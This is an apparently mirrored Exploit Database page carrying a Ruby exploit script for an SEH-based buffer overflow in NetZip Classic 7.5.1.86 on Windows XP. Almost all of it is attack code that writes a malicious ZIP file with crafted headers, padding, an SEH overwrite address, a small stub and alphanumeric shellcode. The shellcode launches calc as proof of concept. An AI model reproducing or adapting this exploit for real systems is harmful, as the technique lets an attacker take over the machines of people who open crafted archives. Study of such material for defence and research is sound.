NetZip – Classic Buffer Overflow (SEH)

• Exploit Database
• 116 阅读

• 作者： C4SS!0 G0M3S
  日期： 2011-01-30
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16083/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118

  # # #[+]Exploit Title: Exploit Buffer Overflow NetZip Classic(SEH) #[+]Date: 01\30\\2011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://proforma.real.com/real/nzclassic/nzclassic.html #[+]Version: 7.5.1.86 #[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN #[+]CVE: N/A # #The structure of the zip file has been copied from the exploit CORELAN TEAM. #Thanks For all Turuial Corelan Team # #Created BY C4SS!0 G0M3S #WWW.INVASAO.COM.BR #Louredo_@hotmail.com # #   def usage() system("cls") system("color 4f"); str = """     ####### # ###### ###### ############## ### #### # ### #### # ####### ###### ###### ## # # ### ## # # ### ## # ####### # ###### ###### 0#############   [+]Exploit Buffer Overlfow NetZip Classic 7.5.1.86 [+]Author C4SS!0 G0M3S [+]E-mail Louredo_@hotmail.com """ print str end if ARGV.length !=1 usage() print "[-]Usage: "+$0+" <File Name>\n" print "[-]Exemple: "+$0+" Exploit.zip\n" exit end usage() filename = ARGV[0] head1 = "\x50\x4B\x03\x04\x14\x00\x00"+ "\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\xe4\x0f" + "\x00\x00\x00";   head2 = "\x50\x4B\x01\x02\x14\x00\x14"+ "\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\xe4\x0f"+ "\x00\x00\x00\x00\x00\x00\x01\x00"+ "\x24\x00\x00\x00\x00\x00\x00\x00";   end1 = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"+ "\x12\x10\x00\x00"+ "\x02\x10\x00\x00"+ "\x00\x00";   buffer = "\x41" * 235 nseh = "\x59\x40\x40\x40" seh = [0x10057A41].pack(&apos;V&apos;)# egg = "\x41" * 5 #4 INC ECX egg += "\x61" * 6 #6 POPAD egg += "\x04\x10" #ADD AL,10 egg += "\x98\xd1" #CALL EAX egg += "\x41" * 5 #JUNK TO SHELLCODE puts "[*]Identifying the length Shellcode\n\n" sleep(1) shellcode = "PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYKIPVQXIOO3L5FBPXLN9D"+ "46DJTNQ5N0XVQD84XK3M8KL33RXE8L4MUP02XOLSUO92XOFVCKEL3X4NNSM5RNJGJP2ELOOSRJM5M64X"+ #Shellcode WinExec("calc",0) "USVQ9WQKWLVSPJUT1XJDFWEZUB4O7SLKKUKUURKZP179M1XKMWRP8EKI2M8YSZW7KCJ8OPL0O7SHSPSY"+ #ALPHA BASEADDRESS EAX "41GL7XXWKLCLNK35O0WQCSTPQY1VSXML5O6L5IQCNMHJUNJL1UUOX7VMIWMWK9PXYKN0QE1OFTNVOMUT"+ "YK7OGT8FOPYLP3K8W5UCOM83KYZA"   puts "[*]The length is Shellcode: #{shellcode.length}\n\n" sleep(1)     junk = "\x41" * (4064 - (buffer+nseh+seh+egg+shellcode).length)   payload = buffer+nseh+seh+egg+shellcode+junk   payload += ".txt"   exploit_zip = head1+payload+head2+payload+end1 puts "[*]Creating the File #{filename}\n\n" sleep(1) begin   f = File.open(filename,"w") f.puts exploit_zip f.close puts "[*]The File #{filename} was Created with Success\n\n" sleep(1) rescue   puts "[*]Error When Creating The File #{filename}\n\n" exit   end